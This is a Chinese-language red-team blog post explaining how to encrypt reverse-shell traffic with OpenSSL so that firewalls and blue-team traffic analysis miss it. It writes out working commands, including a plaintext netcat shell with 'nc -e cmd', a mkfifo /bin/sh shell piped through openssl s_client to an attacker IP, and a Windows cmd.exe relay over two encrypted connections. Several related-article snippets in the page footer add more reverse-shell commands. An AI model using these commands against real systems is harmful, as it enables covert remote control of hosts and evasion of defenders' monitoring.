红队隧道加密之OpenSSL加密反弹Shell(一)

最新推荐文章于 2023-10-12 17:01:44 发布
最新推荐文章于 2023-10-12 17:01:44 发布
阅读量967 收藏 3
点赞数
分类专栏: 红队的自我修养 文章标签: 网络安全 安全 web安全 网络攻击模型
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xf555er/article/details/128051122
版权

前言

在红队的后渗透阶段中, 往往需要反弹shell进行下一步的内网横向渗透, 而这种反弹shell大多数都有一个缺点, 那就是其传输的流量都是明文传输, 相当容易被内网的防火软件所捕捉, 要是蓝队对此流量进行朔源分析, 很容易就能复现攻击的整个流程

例如此处用netcat反弹Shell进行测试, 首先在攻击机(kali,192.168.47.134)监听本机6666端口

nc -lvp 6666

image-20221105152309389


在目标主机(win7,192.168.47.149)连接攻击机并反弹一个CmdShell

nc 192.168.47.134 6666 -e cmd

image-20221105152453317


随后可在攻击机接收反弹的CmdShell, 输入ipconfig进行测试

1


在攻击机使用wireshark抓取攻击机与目标主机之间的传输数据包, 并追踪其TCP流, 可发现是明文数据

1

1


OpenSSL的介绍

OpenSSL 是一个开源的软件库包,应用程序可以使用这个包来进行安全通信,避免窃听,同时确认另一端连接者的身份。这个包广泛被应用在互联网的网页服务器上

其主要库是以C语言所写成,实现了基本的加密功能,实现了SSL与TLS协议。OpenSSL 可以运行在OpenVMS、 Microsoft Windows以及绝大多数类Unix操作系统上(包括Solaris,Linux,Mac OS X与各种版本的开放源代码BSD操作系统)。

它也提供了一个移植版本,可以在IBM i(OS/400)上运作


OpenSSL下载安装

Windows安装

Windows版本下载地址: https://slproweb.com/products/Win32OpenSSL.html

若你的windows系统是64位, 则按下图所示选择即可

image-20221105171202996


Linux安装

1.下载并安装OpenSSL

# wget https://www.openssl.org/source/openssl-1.1.1s.tar.gz --no-check-certificate
# tar -xzvf openssl-1.1.1s.tar.gz
# cd openssl-1.1.1s
# mkdir /usr/local/openssl
# make
# make install

2.创建软链接

# ln -s /usr/local/openssl/bin/openssl /usr/bin/openssl

3.查看openssl版本验证是否安装成功

#openssl version

OpenSSL使用流程

1.生成自签名证书

在攻击机输入如下命令生成自签名证书, 此处采用的是RSA加密方式; 随后会要求输入证书信息, 直接一路回车即可

openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes

命令语法: openssl req -x509 -newkey rsa:4096 -keyout [key文件] -out [cert文件] -days 365 -nodes

image-20221105154017781


2.反弹加密Shell

Linux客户端

在攻击机创建服务端, 监听本机的4444端口

openssl s_server -quiet -key key.pem -cert cert.pem -port 4444

在linux客户端输入如下命令进行反弹shell

mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 192.168.47.134:4444 > /tmp/s; rm /tmp/s

命令语法: mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect [服务端IP]:[监听端口] > /tmp/s; rm /tmp/s

image-20221105165717054


随后攻击机接收到反弹回来的shell

image-20221105170041611


Windows客户端

与Linux客户端不一样的是, Windows客户端需要在攻击机用两个shell分别创建两个服务端来对接, 这两个服务端可以是相同IP不同端口

openssl s_server -quiet -key key.pem -cert cert.pem -port 4444

openssl s_server -quiet -key key.pem -cert cert.pem -port 6666

命令语法: openssl s_client -quiet -connect [ip]:[port1] | cmd.exe | openssl s_client -quiet -connect [ip]:[port2]

image-20221105163711458


随后返回客户端输入如下命令, 意思是从192.168.47.134:4444获取命令发送给cmd执行, 然后将执行结果返回给192.168.47.134:6666

openssl s_client -quiet -connect 192.168.47.134:4444 | cmd.exe | openssl s_client -quiet -connect 192.168.47.134:6666

命令语法: openssl s_client -quiet -connect [ip]:[port1] | cmd.exe | openssl s_client -quiet -connect [ip]:[port2]

image-20221105164019604


随后在攻击机接收到反弹的shell

image-20221105164229692


抓包分析

在攻击机使用wireshark抓包分析, 可发现攻击机和目标主机使用TLS1.2协议进行加密通讯

image-20221105170359664


参考文章

  • https://wolke.cn/post/4904f19c.html

  • https://blog.csdn.net/nvsirgn/article/details/121084789

Henry404s
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Windows下反弹shell的方法
2ed
07-16 1万+
1.powercat反弹shell powercat(https://github.com/besimorhino/powercat )为Powershell版的Netcat,实际上是一个powershell的函数,使用方法类似Netcat 首先攻击者开启监听 nc -lvp 6666 或者使用powercat监听 powercat -l -p 6666 接着在目标机上反弹cmd shell:...
反弹Shell,看这一篇就够了
Appleteachers的博客
04-24 1081
前言 在渗透测试实战中,我们经常会遇到Linux系统环境,而让Linux主机反弹shell是再常见不过的事情了。 反弹shell,就是攻击机监听在某个TCP/UDP端口为服务端,目标机主动发起请求到攻击机监听的端口,并将其命令行的输入输出转到攻击机。 正向连接 假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。 反向连接 那么为什么要用反弹shell
python反向连接shell,可穿透防火墙
07-30
python reverse_shell.py 反弹目的ip 3322 反弹目的ip 执行nc -l 3322 即可连结 被控端
WEB安全基础 - - -Linux反弹shell
weixin_67503304的博客
08-23 2844
详细讲解Linux反弹shell包含的NC正向shell,NC反向shell,bash反弹shell,无e参数反弹shell,Base64编码绕过,Telnet反弹shellOpenSSL反弹443端口,流量加密传输
Openssl反弹加密shell
干铮的博客
03-14 877
使用Openssl反弹加密shell 进行渗透测试得后渗透阶段为了进行横向渗透,往往需要反弹shell,如果反弹shell,如果反弹shell都是明文传输,如果内网有IDS或者防护软件会进行流量分析,很快被发现,如果攻击流量回溯分析。就可以复现攻击得过程,此时整个攻击就会被暴漏出来。 使用wireshark抓包直接看到输入得命令返回信息,这些命令会被WAF或者IPS所检测所以需要对这些信息进行加密。 ...
OpenSSL反弹加密shell
redwand的博客
02-21 390
在进行渗透测试的后渗透阶段为了进一步横行渗透往往需要反弹 shell,这里列出了使用各种语言进行反弹 shell 的方法,我发现这种反弹 shell 方式都有一个缺点,那就是所有的流量都是明文传输的。本文介绍了openssl反弹加密shell的常规方法。
渗透测试-Linux反弹shell
lza20001103的博客
05-11 2920
Linux反弹shell
反弹Shell原理与实现
m0_62451321的博客
11-14 2967
Windows作为攻击者主机,Linux是被入侵主机(目标主机),此时目标主机上只要能正常运行Linux命令便可以实现反弹,利用Linux的Bash命令重定向和Windows上的Netcat应用程序,如果没有,则网络下载netcat应用程序即可。远程桌面,Web服务,SSH,SMB等等,都是正向连接。(3)对于病毒,木马,受害者什么时候能中招,对方的网络环境是什么样的,什么时候开关机,都是未知,所以建立一个服务端,让恶意程序主动连接,才是上策。(1)某客户机中了你的木马,但是它在局域网内,你直接连接不了。
使用OpenSSL反弹shell
mirocky的博客
10-12 462
使用openssl进行反弹shell的过程
Windows nc命令下载使用与使用bash建立反弹shell
永远是少年
12-30 2948
今天继续给大家介绍渗透测试相关知识,本文主要内容是Windows nc命令下载使用与使用bash建立反弹shell。 一、nc命令下载 二、nc命令详解 三、建立bash反弹shell详解
cmd反弹shell提权
10-24
cmd反弹shell提权
攻防手册,攻防教程
最新发布
04-20
是一个模拟攻击团,通过模拟真实的黑客攻击来测试组织的安全性,而蓝则是负责防御和应对这些攻击的团。 以下是攻防教程的一般步骤和内容: 网络侦察:开始通过收集目标组织的信息,包括IP地址、...
实战攻防之视角下的防御体系突破.docx
08-23
实战攻防之视角下的防御体系突破
测试之Linux提权小结1
08-03
提权背景权 限 提 升 意 味 着 用 户 获 得 不 允 许 他 使 用 的 权 限 。比 如 从 一 个 普 通 用 户 , 通 过 “ 手 段 ” 让 自
渗透打点工具-FindUpload
03-07
FindUpload是一款打点工具,帮助渗透测试人员批量url快速发现文件上传点和登录框,提高渗透测试效率和减少手工发现时间。
必备技能之隐蔽的技巧1
08-03
5.1 添加仓库 5.2 安装Certbot的Nginx软件包 5.3 验证配置是否正确 5.5 获取证书 5.6 自动续订
网络安全进阶篇之流量加密(十三章-1)使用 Openssl 反弹加密 shell
划水的小白白
05-19 843
文章目录零、什么是OpenSSL?一、为什么要进行流量加密二、抓取流量包三、对数据进行加密 零、什么是OpenSSL? 在计算机网络上,OpenSSL 是一个开放源代码的软件库包,应用程序可以使用这个包来进行安全通信,避免窃听,同时确认另一端连接者的身份。这个包广泛被应用在互联网的网页服务器上。 一、为什么要进行流量加密 进行渗透测试的后续渗透阶段为了扩大战果,往往需要横行渗透,往往需要反弹 shell,如果反弹 shell 都是明文传输,那么内网里有 IDS 或者防护软件会进行流量进行分析,检测带有攻
利用OpenSSL加密反弹shell流量
The current road is different, love needs to distinguish between right and wrong
02-15 3136
简介 在进行后渗透阶段的时候通常为了进一步横向操作往往需要反弹 shell,但是反弹 shell 方式都有一个缺点,流量是以明文方式进行传输的。进行流量分析的话就会很快被发现,如果对攻击流量进行溯源分析,检测带有攻击的特征,就可以复现攻击过程。 实验环境 kali:192.168.95.128 centos:192.168.95.147 Wireshark抓包 在kali上使用nc监听一个端口 nc -lvvp 4444 将centos的shell反弹过去 bash -i
反弹shell原理与实现
兴乐安宁的博客
04-20 1997
反弹shell(Reverse Shell)是一种常用于网络攻击中的技术,其目的是让攻击者通过远程控制程序获取被攻击计算机的权限。反弹shell技术通常是通过在受害者计算机上运行一个程序(称为“后门”),将计算机的控制权传递给攻击者。攻击者可以使用该程序在远程计算机上执行命令并访问其文件系统、网络接口等资源。在反弹shell攻击中,攻击者通常首先在受害者计算机上安装一个后门程序,然后使用一个包含恶意代码的文件或链接来欺骗用户打开该文件或链接。
netcat流量加密
05-26
Netcat是一个网络工具,它可以通过网络连接两台计算机并传输数据。在默认情况下,Netcat并不提供流量加密功能,但是我们可以使用其他工具将Netcat传输的数据进行加密,以保护数据的安全性。 一种简单的方式是使用OpenSSL工具来加密数据流。例如,我们可以使用以下命令将本地端口的数据加密并发送到远程主机的指定端口: ``` $ openssl s_client -quiet -connect remote_host:remote_port | nc -q0 local_host local_port | openssl s_server -quiet -key key.pem -cert cert.pem ``` 其中,key.pem和cert.pem是用于SSL/TLS加密的私钥和证书文件。此命令将在本地主机上启动一个OpenSSL服务器,并将通过Netcat将加密的数据流发送到远程主机。远程主机也需要运行一个OpenSSL服务器来解密数据流。 另一种方法是使用SSH隧道加密Netcat传输的数据。可以使用以下命令在本地主机上创建一个SSH隧道,并将本地端口的数据发送到远程主机的指定端口: ``` $ ssh -L local_port:remote_host:remote_port user@remote_host "nc localhost remote_port" ``` 这将在本地主机上创建一个SSH隧道,并将本地端口的数据流转发到远程主机的指定端口。在此过程中,数据流将通过SSH隧道进行加密传输,从而保护数据的安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值